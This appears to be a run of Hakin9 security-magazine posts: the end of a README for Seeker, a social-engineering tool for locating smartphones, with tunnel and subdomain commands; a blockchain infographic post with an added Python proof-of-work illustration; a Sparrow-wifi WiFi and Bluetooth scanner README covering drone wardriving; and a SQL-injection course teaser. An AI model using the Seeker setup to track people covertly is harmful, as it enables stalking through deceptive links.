optional arguments:
  -h, --help                              show this help message and exit
  -s SUBDOMAIN, --subdomain Subdomain    Provide Subdomain for Serveo URL ( Optional )
  -k KML, --kml KML                       Provide KML Filename ( Optional )
  -t TUNNEL, --tunnel TUNNEL              Specify Tunnel Mode [manual]

# Example

# SERVEO 
########
python3 seeker.py

# NGROK ETC.
############

# In First Terminal Start seeker in Manual mode like this
python3 seeker.py -t manual

# In Second Terminal Start Ngrok or any other tunnel service on port 8080
./ngrok http 8080

#-----------------------------------#

# Subdomain
########### 
python3 seeker.py --subdomain google
python3 seeker.py --tunnel manual --subdomain zomato

Known Problems

  • Services like Serveo and Ngrok are banned in some countries, such as Russia, so if they are banned in your country you may not get a URL. If that is not the case, first READ THE CLOSED ISSUES; if your problem is not listed, create a new issue.


The post Seeker - Accurately Locate Smartphones using Social Engineering appeared first on Hakin9 - IT Security Magazine.

Blockchain In Mobile Application Market | Infographic by AC Market

A common misconception about blockchain technology is that it was developed only to power Bitcoin. That was indeed its original purpose, but blockchain is capable of far more than that.

Blockchain is shorthand for a family of distributed ledger technologies that can be used to record and track anything of value, from financial transactions to medical records or even land records.

Let's discuss why blockchain technology stands to revolutionize the way we communicate with each other.

1. The way it tracks and stores data

Blockchain stores data in small sections known as blocks; the blocks are linked together in chronological order to form an uninterrupted chain.

If you alter or modify the data recorded in a specific block, you cannot simply rewrite it. Instead, the change is recorded in a new block showing that x was modified to y at a specific date and time. This is a non-destructive way of recording data alterations over time.

2. It creates trust in the data

Before a block can be added to the chain, a few things have to happen. First, a cryptographic puzzle must be solved, which creates the block. The computer that solves the puzzle forwards the answer to the other computers on the network; this is known as proof-of-work.

The proof-of-work is verified by the network, and if there are no issues the block becomes part of the chain. These puzzles, and the verification carried out by many computers, guarantee that every block on the chain can be trusted.
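As an added illustration of the two points above (hash-linked blocks and a proof-of-work puzzle), here is a toy chain in Python. It is not the code of any real blockchain, nor AC Market's; the puzzle (a block hash with a fixed number of leading zero hex digits), the field names and the sample land records are this example's own assumptions.

```python
import hashlib
import json

# Toy hash-linked chain with proof-of-work. Everything here is an assumption
# made for illustration: the puzzle, the field names and the sample records.

DIFFICULTY = 3  # leading hex zeros required in a block hash (tiny, so it runs fast)


def block_hash(block):
    """SHA-256 over the canonical JSON encoding of a block's fields (hash excluded)."""
    fields = {k: v for k, v in block.items() if k != "hash"}
    encoded = json.dumps(fields, sort_keys=True, separators=(",", ":")).encode()
    return hashlib.sha256(encoded).hexdigest()


def mine_block(index, data, prev_hash, difficulty=DIFFICULTY):
    """Solve the puzzle: find a nonce so the block hash starts with `difficulty` zeros."""
    block = {"index": index, "data": data, "prev_hash": prev_hash, "nonce": 0}
    while True:
        h = block_hash(block)
        if h.startswith("0" * difficulty):
            block["hash"] = h
            return block
        block["nonce"] += 1


def verify_chain(chain, difficulty=DIFFICULTY):
    """Re-check every block: stored hash matches contents, meets the difficulty
    target, and links to the previous block. Returns (ok, index_of_first_bad_block)."""
    for i, block in enumerate(chain):
        if block_hash(block) != block["hash"]:
            return False, i
        if not block["hash"].startswith("0" * difficulty):
            return False, i
        expected_prev = "0" * 64 if i == 0 else chain[i - 1]["hash"]
        if block["prev_hash"] != expected_prev:
            return False, i
    return True, None


def build_chain(records, difficulty=DIFFICULTY):
    """Mine one block per record, each linked to the hash of the one before it."""
    chain = []
    prev = "0" * 64  # genesis block has no predecessor
    for i, rec in enumerate(records):
        b = mine_block(i, rec, prev, difficulty)
        chain.append(b)
        prev = b["hash"]
    return chain


def tamper_demo():
    """Build a chain from constructed land records, edit history in the middle
    block, and return (valid_before, valid_after, first_bad_index)."""
    records = [
        {"owner": "Anne", "parcel": "lot-17"},
        {"owner": "Anne", "parcel": "lot-17", "note": "mortgage registered"},
        {"owner": "Steve", "parcel": "lot-17", "note": "transferred from Anne"},
    ]
    chain = build_chain(records)
    ok_before, _ = verify_chain(chain)
    chain[1]["data"]["note"] = "mortgage cleared"  # rewrite the middle block in place
    ok_after, bad = verify_chain(chain)
    return ok_before, ok_after, bad


if __name__ == "__main__":
    print(tamper_demo())
```

Calling tamper_demo() builds three blocks, rewrites the note in the middle block and re-verifies: the chain validates before the edit and fails at block 1 afterwards, because the stored hash no longer matches the contents, and every later block's prev_hash would have to be re-mined as well. The difficulty is deliberately tiny so the block runs in well under a second; real networks tune it so that a block takes minutes to mine.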

3. No more intermediaries

Currently, when doing business with one another, we do not show the other party our financial or business records. Instead, we rely on intermediaries we trust, such as a bank or an attorney, to check our records and keep that data private.

These intermediaries build trust between the parties and are able to verify, for example, that "yes, Anne is the rightful owner of this land". This method limits exposure and risk, but it adds an extra step to the exchange, increasing the time and money spent. If Anne's land records were stored in a blockchain, she could cut out the middleman, her lawyer.

As we now know, all blocks added to the chain have been verified and cannot be tampered with, so Anne can simply show Steve the land title information directly. This saves time and money and eliminates middlemen.

Blockchain In Mobile Application Market

Blockchain technology is built on firm foundations and is robust and adaptable. These attributes go a long way toward gaining people's trust, and they will be very useful for mobile app development.

Using blockchain technology in mobile application development offers advantages such as transparency and flexibility, and it also helps prevent frequent app crashes and server downtime.

To know more about this, check out the infographic developed on ‘Blockchain In Mobile Application Market’ by AC Market.


The post Blockchain In Mobile Application Market | Infographic by AC Market appeared first on Hakin9 - IT Security Magazine.

Sparrow-Wifi: Next-Gen GUI-based WiFi And Bluetooth Analyzer For Linux


Sparrow-wifi has been built from the ground up to be the next-generation 2.4 GHz and 5 GHz WiFi spectral awareness tool. At its most basic it provides a more comprehensive GUI-based replacement for tools like inSSIDer and linssid that runs specifically on Linux. In its most comprehensive use cases, sparrow-wifi integrates WiFi, software-defined radio (HackRF), advanced Bluetooth tools (traditional and Ubertooth), traditional GPS (via gpsd), and drone/rover GPS via MAVLink in one solution.

[NOTE: Check the Raspberry Pi section for updates. A setup script is now included to get the project running on Raspbian Stretch.]

Written entirely in Python3, Sparrow-wifi has been designed for the following scenarios:

  • Basic wifi SSID identification
  • Wifi source hunt - Switch from normal to hunt mode to get multiple samples per second and use the telemetry windows to track a wifi source
  • 2.4 GHz and 5 GHz spectrum view - Overlay spectrums from Ubertooth (2.4 GHz) or HackRF (2.4 GHz and 5 GHz) in real time on top of the wifi spectrum (invaluable in poor connectivity troubleshooting when overlapping wifi doesn't seem to be the cause)
  • Bluetooth identification - LE advertisement listening with standard bluetooth, full promiscuous mode in LE and classic bluetooth with Ubertooth
  • Bluetooth source hunt - Track LE advertisement sources or iBeacons with the telemetry window
  • iBeacon advertisement - Advertise your own iBeacons
  • Remote operations - An agent is included that provides all of the GUI functionality via a remote agent the GUI can talk to.
  • Drone/Rover operations - The agent can be run on systems such as a Raspberry Pi and flown on a drone (it's made several flights on a Solo 3DR), or attached to a rover in either GUI-controlled or autonomous scan/record modes.
  • The remote agent is JSON-based so it can be integrated with other applications
  • Import/Export - Ability to import and export to/from CSV and JSON for easy integration and re-visualization. You can also just run 'iw dev scan' and save it to a file and import that as well.
  • Produce Google maps when GPS coordinates are available for both discovered SSIDs / Bluetooth devices or to plot the WiFi telemetry over time.

A few sample screenshots. The first is the main window showing a basic wifi scan, the second shows the telemetry/tracking window used for both Wifi and bluetooth tracking.

Installation

sparrow-wifi uses python3, qt5, and qtchart for the UI. On a standard Debian variant you may already have python3 and qt5 installed; the only addition needed to run it is qtchart. The following commands should get you up and running with WiFi on both Ubuntu and Kali Linux:

sudo apt-get install python3-pip gpsd gpsd-clients python3-tk python3-setuptools 
sudo pip3 install QScintilla PyQtChart gps3 dronekit manuf python-dateutil numpy matplotlib

Some folks have been running sparrow with a python virtualenv, if you'd like to run it in an isolated python environment, the following sequence should get you up and running:

git clone https://github.com/ghostop14/sparrow-wifi
cd sparrow-wifi
virtualenv --python=python3 $HOME/sparrow
source $HOME/sparrow/bin/activate
pip3 install gps3 python-dateutil requests pyqt5 pyqtchart numpy matplotlib
sudo python3 sparrow-wifi.py

 

NOTE: If you're trying to run on a Raspberry Pi, see the Raspberry Pi section below. Only the remote agent has been run on a Pi, some of the GUI components wouldn't install / set up on the ARM platform.

Running sparrow-wifi

Because it needs to use the standard command-line tool 'iw' for wifi scans, you will need to run sparrow-wifi as root. Simply run this from the cloned directory:

sudo ./sparrow-wifi.py

WiFi Notes

One item of note on WiFi scanning, especially in the 5 GHz range, is finding a card that works. It's not so much an issue with the 'iw' tool itself, but in more advanced configurations where monitor mode is required it can be a problem.

Bluetooth

For those familiar with WiFi but new to Bluetooth scanning, Bluetooth is different enough that some of what you may expect based on WiFi won't be available (and may seem a bit frustrating at first). It all fundamentally comes down to how Bluetooth operates. Bluetooth uses frequency hopping across the entire 2.4 GHz range, so it doesn't present in nice clean single-channel buckets like WiFi does. To complicate things, there is a Low Energy (BTLE) mode and a Classic mode that are incompatible from an RF perspective, so generally a Bluetooth adapter can only scan for one type or the other at any given time.

Bluetooth devices are also generally only discoverable when advertising (think broadcasting). The only other way to find Bluetooth devices is with hardware that can sniff all Bluetooth packets out of the air, which standard Bluetooth adapters don't do; that is where hardware like the Ubertooth comes in to get a better view of the Bluetooth environment. Of course, if a device isn't transmitting you have nothing to go on, and if you have to catch packets as they are transmitted you may need to scan or linger longer to see them, increasing scan frame times to as long as 30 seconds to a minute.

With all that said, with a standard / built-in Bluetooth adapter, Sparrow-wifi can do advertisement scanning for Bluetooth Low Energy (BTLE) devices. If they advertise their transmit power, it will attempt a range calculation; this is what the latest iBeacon solutions and products do to be physically locatable. However, with multipath, internal walls, etc., don't expect a high level of accuracy. As an added bonus, sparrow-wifi can also advertise its own iBeacons for tracking (this could be useful from a remote agent to turn on location discovery). Not all Bluetooth cards will advertise transmit power, so you may not always get a range. If you do have an Ubertooth, sparrow-wifi can use it for promiscuous discovery of both BTLE and Classic Bluetooth devices. There is a tradeoff: traditional LE scans update faster for tracking, which makes Bluetooth 'hunt' easier, whereas promiscuous mode can identify more devices at the expense of needing to linger longer to listen.
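As an added example of the range calculation the paragraph above describes, the following Python parses an iBeacon advertisement and estimates distance from RSSI. This is not sparrow-wifi's own code: the iBeacon layout (Apple manufacturer-specific data carrying a UUID, major, minor and the measured power at 1 m) is the published format, but the path-loss formula, the exponent value and the sample advertisement bytes are this example's assumptions; sparrow-wifi's exact calculation is not shown on the page.

```python
import struct
import uuid

# iBeacon advertisement parser plus an RSSI-based range estimate. The path-loss
# model and constants below are assumptions for illustration, not sparrow-wifi's.

APPLE_COMPANY_ID = 0x004C          # Bluetooth SIG company identifier for Apple
IBEACON_TYPE, IBEACON_LEN = 0x02, 0x15


def parse_ad_structures(payload):
    """Split a BLE advertising payload into (ad_type, data) pairs.
    Each structure is: length byte, AD type byte, (length-1) data bytes."""
    out = []
    i = 0
    while i < len(payload):
        length = payload[i]
        if length == 0:
            break  # zero padding marks the end of the significant part
        if i + 1 + length > len(payload):
            raise ValueError("truncated AD structure at offset %d" % i)
        ad_type = payload[i + 1]
        out.append((ad_type, payload[i + 2 : i + 1 + length]))
        i += 1 + length
    return out


def parse_ibeacon(payload):
    """Return {'uuid', 'major', 'minor', 'tx_power'} if the payload carries an
    Apple iBeacon manufacturer-specific structure, otherwise None."""
    for ad_type, data in parse_ad_structures(payload):
        if ad_type != 0xFF or len(data) < 25:
            continue
        company = struct.unpack_from("<H", data, 0)[0]  # company ID is little-endian
        if company != APPLE_COMPANY_ID or data[2] != IBEACON_TYPE or data[3] != IBEACON_LEN:
            continue
        beacon_uuid = uuid.UUID(bytes=bytes(data[4:20]))
        # major and minor are big-endian; tx_power is a signed dBm value at 1 m
        major, minor, tx_power = struct.unpack_from(">HHb", data, 20)
        return {"uuid": str(beacon_uuid), "major": major, "minor": minor, "tx_power": tx_power}
    return None


def estimate_range_m(rssi_dbm, tx_power_dbm, path_loss_exponent=2.0):
    """Log-distance path-loss model: d = 10 ** ((txPower - RSSI) / (10 * n)).
    n = 2 is free space; indoors, walls and multipath push n higher and make the
    estimate correspondingly rougher, which is why the text cautions on accuracy."""
    return 10 ** ((tx_power_dbm - rssi_dbm) / (10.0 * path_loss_exponent))


# Constructed sample advertisement: a flags structure followed by an iBeacon
# structure with a sample UUID, major 1, minor 2, measured power -59 dBm (0xC5).
SAMPLE_ADV = bytes.fromhex(
    "020106"                                  # len 2, type 0x01 (flags), value 0x06
    "1aff4c000215"                            # len 26, type 0xFF, Apple 0x004C, 0x02, 0x15
    "e2c56db5dffb48d2b060d0f5a71096e0"        # 16-byte UUID (sample value)
    "0001" "0002" "c5"                        # major 1, minor 2, tx power -59 dBm
)


if __name__ == "__main__":
    beacon = parse_ibeacon(SAMPLE_ADV)
    print(beacon)
    for rssi in (-59, -69, -79):
        print(rssi, "dBm ->", round(estimate_range_m(rssi, beacon["tx_power"]), 2), "m")
```

With the sample bytes, an RSSI equal to the advertised measured power gives 1 m, and every 20 dB weaker roughly multiplies the estimate by ten under free-space assumptions. A beacon that omits the manufacturer structure, or a card that reports no tx power, yields None and no range, matching the caveat in the text.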

If you would like to scan for bluetooth, you'll need a few things:

  1. A bluetooth adapter (test with 'hcitool dev' to make sure it shows up). With an adapter you can do basic BTLE advertisement and iBeacon scans.
  2. [Optional] An Ubertooth for promiscuous discovery scans (BTLE and Classic Bluetooth)
    • Ubertooth tools installed and functioning (you can test it with ubertooth-specan-ui)
    • Blue Hydra installed into /opt/bluetooth/blue_hydra (mkdir /opt/bluetooth && cd /opt/bluetooth && git clone https://github.com/ZeroChaos-/blue_hydra.git). Then make sure you've followed the blue_hydra installation instructions. You can test it with bin/blue_hydra. This must be in /opt/bluetooth/blue_hydra or the app won't find it.

I strongly recommend running 'hcitool lescan' from the command-line first to make sure everything is working okay. If you have an Ubertooth, run ubertooth-specan-ui and run blue_hydra to make sure those tools work properly before attempting in sparrow-wifi.

Some troubleshooting tips:

  • If you don't see any devices with a basic LE advertisement scan, try "hcitool lescan" from the command-line and see if you get any errors. If so address them there. Sometimes a quick "hciconfig hci0 down && hciconfig hci0 up" can fix it.
  • If you have an Ubertooth and don't see any spectrum try running ubertooth-specan or ubertooth-specan-ui from the command line. If you get any errors address them there.

Spectrum

Near real-time spectral overlays in both bands are one feature that differentiates sparrow-wifi from other WiFi tools. To get spectral overlays, two options are available. The less expensive approach is to use an Ubertooth One; spectrum scanning is one of the features of the hardware, with 1 MHz channel resolution. The downside is that the Ubertooth is focused only on the 2.4 GHz spectrum (after all, that's where Bluetooth operates), so you won't be able to scan the 5 GHz range. If you have more experience and/or hardware focused on software-defined radio (SDR) and have a HackRF One available, a somewhat more expensive option, you can scan both the 2.4 GHz (with 0.5 MHz resolution) and 5 GHz (with 2 MHz resolution) spectrum ranges. The next two sections provide details unique to each hardware device. In general, the goal for sparrow-wifi was frame rates of about 10 fps locally and 5 fps via the remote agent (depending on remote hardware and network connectivity).

The following screenshot shows a 2.4 GHz perspective with an Ubertooth spectrum (with 1 MHz bins) overlay. It's quite interesting to watch the spectrum when bluetooth devices are also active. You can observe the bluetooth channel hopping in the spectrum. There are other protocols such as zigbee and other IoT protocols, even cordless phones that may also show up in the 2.4 GHz spectrum that would not otherwise show up on a wifi-only view. Having the spectral overlay provides an invaluable perspective on other interference in the spectrum for troubleshooting say for instance if no overlapping wireless channels seem to be the source of poor connectivity.

Ubertooth One

Once you get an Ubertooth One, the first thing you should do is download and build the latest tools and flash it with the latest firmware version. With that in place, try running ubertooth-specan-ui for a nice quick graphical spectrum display. If this is working, the Ubertooth should work fine in sparrow-wifi (just close any running Ubertooth tools before attempting to display the spectrum). Sparrow-wifi will automatically detect that the Ubertooth is present and the tools are available on startup and enable the appropriate menu choices. Note that if you start sparrow-wifi without the Ubertooth connected, just close sparrow-wifi and reopen it and it should see it. You can manually test it with lsusb to see that the Ubertooth is present.

HackRF One

HackRF support has been added to take advantage of the hackrf_sweep capabilities added to the HackRF firmware. With a HackRF you can sweep the entire range for a view of the spectrum. While hackrf_sweep can sweep from 2.4 GHz through 5 GHz, the frame rate is too slow (like 1 frame every 2 seconds), so you can use it for only one band at a time. With that said, if you have both an Ubertooth and a HackRF, you could use the Ubertooth to display the 2.4 GHz band and the HackRF to display the 5 GHz band simultaneously.

IMPORTANT: Standard RF and antenna rules apply. If you want to monitor either band, make sure you have an antenna capable of receiving in that band (the standard telescoping HackRF antenna probably won't work as it's only rated up to 1 GHz). And if you do want to grab an external dual-band antenna used on wireless cards, just note that the connector polarity is typically reversed (rp-sma rather than the sma connector on the HackRF) so you'll need to grab an adapter to connect it to the HackRF (they're only a couple dollars on Amazon). An RP-SMA antenna will screw on to the SMA connector but the center pin isn't there so you won't actually receive anything. Just a word of caution.

Notes: The 5 GHz spectrum, even with a dual-band antenna, can be difficult to see signals in the same way as in 2.4 GHz. The SNR for 5 GHz seems much lower than for 2.4 GHz. Some of this could be attributed to the HackRF, as 5 GHz is getting towards the edge of its usable frequency range, while part of it can also be attributed to 5 GHz not penetrating walls, ceilings, etc. as well as 2.4 GHz does. Sometimes the 5 GHz band shows better in a waterfall plot to distinguish an active signal; if that's what you need, try the tool qspectrumanalyzer.

Troubleshooting tips:

  • If you don't see any spectrum at all try running hackrf_sweep from the command-line. If you get any errors, address them there.

GPS

Sparrow-wifi relies on gpsd to provide standard GPS communications. During testing there were a number of GPS-related issues worth being aware of. First in terms of GPS receivers, make sure you get one that works with gpsd. I've tested it with a GlobalSAT ND-105C Micro USB receiver. I've also used a GPS app on an android device to provide GPS over bluetooth (although this takes some tinkering, and would preclude using the bluetooth adapter for scanning while using it for GPS).

So the first important note is on the GPS receiver side. If you are planning on using the GPS receiver indoors, you may need to make sure the GPS you get specifically states it will work indoors. Anyone with a Garmin or other outdoor sports GPS system may be aware that they tend to not synchronize with satellites well while indoors. The stock GPS on the Solo 3DR drone is the same way as is the GlobalSAT receiver. When they're close to windows, etc. they may finally sync up after some time, but reception indoors isn't great and if you're in an office building or other metal/concrete structure, the receiver may have a tough time receiving the satellite signals. So keep this in mind when picking a GPS receiver.

In terms of getting the receiver to work with gpsd, some challenges were encountered. First, the easiest way to test the GPS is to stop the gpsd service (service gpsd stop) and run gpsd from the command line with debugging enabled. If you have a USB-based GPS you should see a device such as /dev/ttyUSB0 appear when it is connected. If that's the case, a command similar to this starts gpsd in the foreground for a quick test:

gpsd -D 2 -N /dev/ttyUSB0

If you see good data, you can daemonize it by just removing the -N parameter. On Ubuntu, editing /etc/default/gpsd and specifically putting /dev/ttyUSB0 in the device parameter and restarting the service worked fine. However on Kali linux and the Raspberry Pi, the same process didn't work as if the gpsd service was ignoring the parameter. In those cases, the GPS service was set to not auto-start and the gpsd daemon was started manually from the command-line with the command 'gpsd /dev/ttyUSB0'.

Once the daemon is up and working, xgps is a tool that's part of the gpsd-clients package that provides a really nice GUI to check GPS and satellite status. If you run xgps it will tell you when the receiver is synchronized and give you a number of other parameters to make sure it is working correctly. If everything looks like it's working with xgps, then sparrow-wifi should be able to pull the data as any other gpsd client would.

Running sparrow-wifi remote agent

Because the agent has the same requirements as the GUI in terms of system access, you will need to run the agent as root as well. Simply run:

sudo ./sparrowwifiagent.py

By default it will listen on port 8020. There are a number of options that can be seen with --help, and a local configuration file can also be used.

An alternate port can also be specified with:

sudo ./sparrowwifiagent.py --port=<myport>

There are a number of options including IP connection restrictions and record-local-on-start. Here's the --help parameter list at this time:

usage: sparrowwifiagent.py [-h] [--port PORT] [--allowedips ALLOWEDIPS]
                           [--mavlinkgps MAVLINKGPS] [--sendannounce]
                           [--userpileds] [--recordinterface RECORDINTERFACE]
                           [--ignorecfg] [--cfgfile CFGFILE]
                           [--delaystart DELAYSTART]

Sparrow-wifi agent

optional arguments:
  -h, --help            show this help message and exit
  --port PORT           Port for HTTP server to listen on
  --allowedips ALLOWEDIPS
                        IP addresses allowed to connect to this agent. Default
                        is any. This can be a comma-separated list for
                        multiple IP addresses
  --mavlinkgps MAVLINKGPS
                        Use Mavlink (drone) for GPS. Options are: '3dr' for a
                        Solo, 'sitl' for local simulator, or full connection
                        string ('udp/tcp::' such as:
                        'udp:10.1.1.10:14550')
  --sendannounce        Send a UDP broadcast packet on the specified port to
                        announce presence
  --userpileds          Use RPi LEDs to signal state. Red=GPS
                        [off=None,blinking=Unsynchronized,solid=synchronized],
                        Green=Agent Running [On=Running, blinking=servicing
                        HTTP request]
  --recordinterface RECORDINTERFACE
                        Automatically start recording locally with the given
                        wireless interface (headless mode) in a recordings
                        directory
  --ignorecfg           Don't load any config files (useful for overriding
                        and/or testing)
  --cfgfile CFGFILE     Use the specified config file rather than the default
                        sparrowwifiagent.cfg file
  --delaystart DELAYSTART
                        Wait  seconds before initializing

Drone / Rover Operations

Being able to "war fly" (the drone equivalent of the "wardriving" popular in the WiFi world) was another goal of the project. As a result, a lightweight agent that could run on a small platform such as a Raspberry Pi mounted on a drone was incorporated into the design requirements. The agent has been flown successfully on a Solo 3DR drone (keeping the overall weight under the 350 g payload limit).

The Solo was a perfect choice for the project because the controller acts as a wifi access point and communicates with the drone over a traditional IP network using the mavlink protocol. This allows other devices such as laptops, tablets, and the Raspberry Pi to simply join the controller wifi network and have IP connectivity. This was important for field operations as it kept the operational complexity down.

Because these drones have onboard GPS as part of their basic functionality, it's possible over mavlink (with the help of dronekit) to pull GPS coordinates directly from the drone's GPS. This helps keep the overall payload weight down as an additional GPS receiver does not need to be flown as part of the payload. Also, in order to keep the number of tasks required by the drone operator to a minimum during flight, the agent can be started, wait for the drone GPS to be synchronized, use the Raspberry Pi lights to signal operational readiness, and automatically start recording wifi networks to a local file. The GUI then provides an interface to retrieve those remotely saved files and pull back for visualization.

This scenario has been tested with a Cisco AE1000 dual-band adapter connected to the Pi. Note, though, that I ran into an issue scanning 5 GHz from the Pi for which I finally found the solution: with a dual-band adapter, if you don't disable the internal Pi wireless adapter you won't get any 5 GHz results (this is a known issue). Disable the onboard WiFi by adding the line 'dtoverlay=pi3-disable-wifi' to /boot/config.txt and rebooting. Then you'll be able to scan both bands from the Pi.

The quickest way to start the agent on a Raspberry Pi and pull GPS from a Solo drone is the following command on the Pi (IMPORTANT: see the Raspberry Pi section first; if you're running Raspbian Squeeze, you'll need to build Python 3.5 first (Stretch already has 3.5) to run the agent, since the subprocess functions used were initially removed from Python 3 and then put back in 3.5):

sudo python3.5 ./sparrowwifiagent.py --userpileds --sendannounce --mavlinkgps 3dr

The Raspberry Pi red and green LEDs will then be used as visual indicators transitioning through the following states:

  1. Both lights off - Initializing
  2. Red LED Heartbeat - Connected to the drone (dronekit vehicle connect was successful)
  3. Red LED Solid - Connected and GPS synchronized and operational (the drone can take a couple of minutes for the GPS to settle as part of its basic flight initialization)
  4. Green LED Solid - Agent HTTP server is up and the agent is operational and ready to serve requests

 

Note: Without the mavlink setting, if using a local GPS module, the red LED will transition through the same heartbeat=GPS present but unsynchronized, solid = GPS synchronized states.

If you don't have a second set of hands while flying your drone and want to fly the Pi without having to worry about the agent, you can start the agent in auto-record mode. There are a few scripts in the scripts directory that start with 'rpi' that can be scheduled for monitoring the agent and starting it as appropriate. The overall intention is a headless configuration where the Pi starts up (you'll need to configure the wifi on the Pi ahead of time to automatically connect to the controller wifi network), the agent will be started and automatically go into wifi record mode using the drone's gps for recording. Once you're done the sparrow-wifi agent menu gives you a screen to manage the files in the recordings directory on the agent and download or delete the files there. These scripts in the scripts directory are just samples. It is highly recommended that you customize them and the Pi integration to meet your specific needs, and by all means keep safety (and federal regulations) in mind when doing anything with a drone as you're responsible for both.

Raspberry Pi Notes

Raspbian Stretch

Raspbian Stretch now includes the correct version of Python, so no more custom Python builds. The only thing that has to be handled specially is that PyQtChart is not in the apt repository or available via pip to build on Raspbian. However, thanks to the folks in this thread: https://github.com/mu-editor/mu/issues/441, I've been able to reproduce their pyqtchart build process on Raspbian Stretch. So to make everyone's life easier, there's now a script included with the project called rpi.setup_prerequisites.sh. Run that script with sudo first, then Sparrow "should" work for you. I tested it on a Pi 3B board with the 7" touchscreen and it works great.

Raspbian Jessie

You can run the remote agent on a Raspberry Pi; however, the installation requirements are a bit different. First, Python 3 did not include some of the subprocess module capabilities in the initial 3.x versions prior to 3.5; they were put back in from 3.5 forward. In terms of Raspbian builds, Raspbian Squeeze only has Python 3.4.x in the repository, so the first step will be to download and build Python 3.5. If you're running on Debian Stretch (the latest as of now), you can skip the 3.5 build; its repositories do have Python 3.5.

You can use the following sequence to build python if you need to (you will need to apt-get install libsqlite3-dev prior to building Python since it's built in at compile time now):

sudo apt-get install libsqlite3-dev

cd /tmp
wget https://www.python.org/ftp/python/3.5.5/Python-3.5.5.tgz
tar -zxvf Python-3.5.5.tgz
cd Python-3.5.5
./configure && make -j3 && sudo make install

Once that is done, install the necessary modules into the 3.5 build:

sudo pip3.5 install gps3 dronekit manuf python-dateutil

Then you can run the agent directly with commands like this:

/usr/local/bin/python3.5 ./sparrowwifiagent.py

/usr/local/bin/python3.5 ./sparrowwifiagent.py --mavlinkgps=3dr --recordinterface=wlan0

Note that if you forget to specifically start them with 3.5 you will get an exception thrown since a subprocess function will be missing.

Another important note about using dual band USB wireless adapters on the Raspberry Pi (tested on a Pi 3), is that as long as the internal wireless is enabled, Raspbian won't see the 5 GHz band.

Add this line in your /boot/config.txt to disable the internal wireless, then your dual-band USB wireless will be able to see the 5 GHz band:

dtoverlay=pi3-disable-wifi

The red and green LEDs are also used on the Raspberry Pi to provide some visual feedback:

  1. Both lights off - Initializing
  2. Red LED Heartbeat - gpsd found but unsynchronized (red light will stay off if gpsd is not installed or not running)
  3. Red LED Solid - gpsd receiver synchronized
  4. Green LED Solid - Agent HTTP server is up and the agent is operational and ready to serve requests
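As an added example tying the gpsd test procedure in the GPS section to the LED states just listed (off = no gpsd, heartbeat = gpsd present but unsynchronized, solid = synchronized), here is a minimal gpsd JSON client in Python. It is not sparrow-wifi's own code (the project uses the gps3 library); the port, the ?WATCH command and the TPV "mode" values are gpsd's documented protocol, while the state names, the tracker class and the sample message lines are constructed for this example.

```python
import json
import socket

# Minimal gpsd JSON client. Not sparrow-wifi's code; the state names and the
# sample stream below are constructed for this example.

GPSD_HOST, GPSD_PORT = "127.0.0.1", 2947           # gpsd's default listening port
WATCH_CMD = b'?WATCH={"enable":true,"json":true}\n'  # ask gpsd to stream JSON reports

STATE_OFF = "off"                # no gpsd reachable at all (red LED off)
STATE_HEARTBEAT = "heartbeat"    # gpsd talking, but no 2D/3D fix yet (red LED blinking)
STATE_SOLID = "solid"            # fix acquired, coordinates usable (red LED solid)


class GpsFixTracker:
    """Feed gpsd JSON lines in; read .state, .lat, .lon and .sats_used out."""

    def __init__(self):
        self.state = STATE_OFF
        self.lat = self.lon = None
        self.sats_used = 0

    def feed_line(self, line):
        line = line.strip()
        if not line:
            return self.state
        try:
            msg = json.loads(line)
        except ValueError:
            return self.state  # ignore anything that is not a JSON report
        if not isinstance(msg, dict):
            return self.state
        cls = msg.get("class")
        if cls == "TPV":
            # TPV mode: 0 = unknown, 1 = no fix, 2 = 2D fix, 3 = 3D fix
            if msg.get("mode", 0) >= 2 and "lat" in msg and "lon" in msg:
                self.lat, self.lon = msg["lat"], msg["lon"]
                self.state = STATE_SOLID
            else:
                self.state = STATE_HEARTBEAT
        elif cls == "SKY":
            self.sats_used = sum(1 for s in msg.get("satellites", []) if s.get("used"))
            if self.state == STATE_OFF:
                self.state = STATE_HEARTBEAT
        elif cls in ("VERSION", "DEVICES", "WATCH") and self.state == STATE_OFF:
            self.state = STATE_HEARTBEAT  # gpsd is up; nothing known about the fix yet
        return self.state


def run_against_gpsd(max_lines=20, host=GPSD_HOST, port=GPSD_PORT):
    """Connect to a live gpsd (as started with 'gpsd -N /dev/ttyUSB0' above)
    and return the tracker after consuming max_lines reports."""
    tracker = GpsFixTracker()
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(WATCH_CMD)
        buf = b""
        seen = 0
        while seen < max_lines:
            chunk = sock.recv(4096)
            if not chunk:
                break
            buf += chunk
            while b"\n" in buf:
                line, buf = buf.split(b"\n", 1)
                tracker.feed_line(line.decode("utf-8", "replace"))
                seen += 1
    return tracker


# Constructed sample of what gpsd streams after ?WATCH: a version banner,
# a no-fix TPV while the receiver searches, a SKY report, then a 3D fix.
SAMPLE_STREAM = [
    '{"class":"VERSION","release":"3.17","proto_major":3,"proto_minor":12}',
    '{"class":"TPV","device":"/dev/ttyUSB0","mode":1}',
    '{"class":"SKY","device":"/dev/ttyUSB0","satellites":[{"PRN":5,"used":false},{"PRN":12,"used":false}]}',
    '{"class":"TPV","device":"/dev/ttyUSB0","mode":3,"time":"2019-08-01T12:00:00.000Z",'
    '"lat":51.5007,"lon":-0.1246,"alt":35.0}',
]


def replay_sample():
    """Run the constructed stream through the tracker; returns the state after each line."""
    tracker = GpsFixTracker()
    states = [tracker.feed_line(line) for line in SAMPLE_STREAM]
    return states, tracker


if __name__ == "__main__":
    print(replay_sample()[0])
```

Replaying the sample shows the transition the LEDs mirror: heartbeat as soon as gpsd answers, still heartbeat on a mode-1 TPV, and solid only once a TPV with mode 2 or 3 and coordinates arrives. A TPV that reports mode 3 but carries no lat/lon is treated as unsynchronized, which avoids recording a position before gpsd has one.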

Download tool and support the author: https://github.com/ghostop14/sparrow-wifi 

The post Sparrow-Wifi: Next-Gen GUI-based WiFi And Bluetooth Analyzer For Linux appeared first on Hakin9 - IT Security Magazine.

SQL Injection attacks - using information schema to retrieve data [FREE COURSE CONTENT]


In this video from our Secure Coding with PHP online course, our instructor Munir will show you how badly coded PHP applications become vulnerable to SQL injection attacks; in this specific example, we will be looking at using the information schema to retrieve data. If you want to know how to prevent and/or fix it, join the course, it's all there :). For now though, dive into the video!

 


With this course, if you're a security professional, it will make you more efficient and resourceful in expediting your security reviews on PHP applications. If you are a developer, you will become better at creating secure software rather than just functional software. 

